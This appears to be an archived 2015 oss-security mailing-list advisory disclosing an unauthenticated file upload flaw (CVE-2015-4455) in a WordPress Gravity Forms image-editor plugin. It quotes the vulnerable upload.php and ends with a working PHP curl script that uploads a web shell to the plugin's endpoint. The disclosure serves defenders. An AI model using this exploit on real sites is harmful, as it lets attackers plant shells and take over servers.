Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 10 Jun 2015 10:48:27 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Remote file upload vulnerability in
 aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin

Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plugins@...dpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system.  Including a .php file.  The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.

In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user:

 1 <?php
 2 
 3 $filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
 4 if (file_exists($filename)) {
 5     include_once($filename);
 6 } else {
 7     include_once("../../../../wp-load.php");
 8 }
 9 echo "Here";
10 $image_file = $_FILES['gf_aviary_file'];
11 if($image_file['name']!=''){
12      $max_file_size =  4*1024*1024;
13      $file_size = intval($image_file['size']);
14      if( $file_size > $max_file_size ){
15          $msg = "File Size is too big.";
16          $error_flag = true;
17      }
18      $extension = strtolower(end(explode('.', $image_file['name'])));
19      $aa_options = get_option('gf_aa_options');
20      $supported_files = $aa_options['supported_file_format'];
21      $supported_files = strtolower($supported_files);
22      if(!$error_flag && $supported_files != '' ){
23        $supported_files = explode (',', $supported_files);
24        if(!in_array($extension, $supported_files)){
25           $msg = "No Supported file.";
26           $error_flag = true;
27        }
28      }
29      if(!$error_flag){
30         $wp_upload_dir = wp_upload_dir();
31         if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
32              mkdir($wp_upload_dir['basedir'].'/gform_aviary');
33         }
34         $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
35         $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
36         $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'    ];
37         if(move_uploaded_file($image_file['tmp_name'], $file_name)){
38             $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na    me'];
39         }
40     }
41     $return_obj = array('status' => 'success', 'message' => $file_url);
42     echo json_encode($return_obj);
43  }
44 ?>

CVEID: 2015-4455
OSVDB:
Exploit Code:
	• <?php
	• /*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
	• /*Larry W. Cashdollar @_larry0
	• 6/7/2015
	• shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
	• */
	•  
	•  
	•        $target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/
	• upload.php';
	•        $file_name_with_full_path = '/var/www/shell.php';
	•  
	•        echo "POST to $target_url $file_name_with_full_path";
	•        $post = array('name' => 'shell.php','gf_aviary_file'=>'@...file_name_with_full_path);
	•  
	•        $ch = curl_init();
	•        curl_setopt($ch, CURLOPT_URL,$target_url);
	•        curl_setopt($ch, CURLOPT_POST,1);
	•        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
	•        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
	•        $result=curl_exec ($ch);
	•        curl_close ($ch);
	•        echo "<hr>";
	•        echo $result;
	•        echo "<hr>";
	• ?>

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.